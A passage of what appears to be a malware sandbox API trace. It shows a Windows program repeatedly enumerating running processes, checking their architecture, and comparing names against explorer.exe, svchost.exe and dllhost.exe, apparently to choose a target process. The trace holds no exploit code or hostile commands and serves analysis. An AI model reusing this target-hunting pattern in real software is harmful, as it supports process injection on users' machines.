th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0195.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0195.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0195.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0195.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0195.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0195.095] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.095] CloseHandle (hObject=0xd8) returned 1 [0195.095] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0195.095] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0195.095] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0195.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0195.096] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0195.096] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.096] CloseHandle (hObject=0xd8) returned 1 [0195.096] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0195.097] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0195.097] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0195.097] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0195.097] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0195.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0195.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0195.098] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.098] CloseHandle (hObject=0xd8) returned 1 [0195.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0195.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0195.099] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.099] CloseHandle (hObject=0xd8) returned 1 [0195.099] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0195.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0195.099] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.099] CloseHandle (hObject=0xd8) returned 1 [0195.099] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0195.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0195.100] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.100] CloseHandle (hObject=0xd8) returned 1 [0195.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0195.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0195.100] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.100] CloseHandle (hObject=0xd8) returned 1 [0195.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0195.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0195.101] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.101] CloseHandle (hObject=0xd8) returned 1 [0195.101] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0195.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0195.102] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.102] CloseHandle (hObject=0xd8) returned 1 [0195.102] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0195.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0195.102] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.102] CloseHandle (hObject=0xd8) returned 1 [0195.102] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0195.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0195.103] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.103] CloseHandle (hObject=0xd8) returned 1 [0195.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0195.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0195.103] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.103] CloseHandle (hObject=0xd8) returned 1 [0195.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0195.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0195.104] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.104] CloseHandle (hObject=0xd8) returned 1 [0195.104] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0195.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0195.105] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.105] CloseHandle (hObject=0xd8) returned 1 [0195.105] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0195.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0195.105] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.105] CloseHandle (hObject=0xd8) returned 1 [0195.105] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0195.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0195.106] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.106] CloseHandle (hObject=0xd8) returned 1 [0195.106] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0195.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0195.106] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.106] CloseHandle (hObject=0xd8) returned 1 [0195.106] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0195.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0195.107] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.107] CloseHandle (hObject=0xd8) returned 1 [0195.107] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0195.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0195.108] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.108] CloseHandle (hObject=0xd8) returned 1 [0195.108] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0195.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0195.108] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.108] CloseHandle (hObject=0xd8) returned 1 [0195.108] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0195.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0195.109] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.109] CloseHandle (hObject=0xd8) returned 1 [0195.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0195.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0195.109] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.109] CloseHandle (hObject=0xd8) returned 1 [0195.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0195.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0195.110] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.110] CloseHandle (hObject=0xd8) returned 1 [0195.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0195.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0195.111] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0195.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0195.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0195.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0195.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0195.113] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0195.113] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.114] CloseHandle (hObject=0xd8) returned 1 [0195.114] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0195.114] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0195.114] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.114] CloseHandle (hObject=0xd8) returned 1 [0195.114] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0195.114] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0195.114] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0195.114] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0195.115] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0195.115] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.115] CloseHandle (hObject=0xd8) returned 1 [0195.115] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0195.116] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.116] CloseHandle (hObject=0xd8) returned 1 [0195.116] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0195.116] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0195.176] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.176] CloseHandle (hObject=0xd8) returned 1 [0195.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0195.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0195.177] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0195.177] CloseHandle (hObject=0xd8) returned 1 [0195.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0195.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0195.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0195.178] CloseHandle (hObject=0xd4) returned 1 [0195.178] Sleep (dwMilliseconds=0x3e8) [0196.210] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0196.213] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0196.213] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0196.214] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0196.214] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0196.215] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 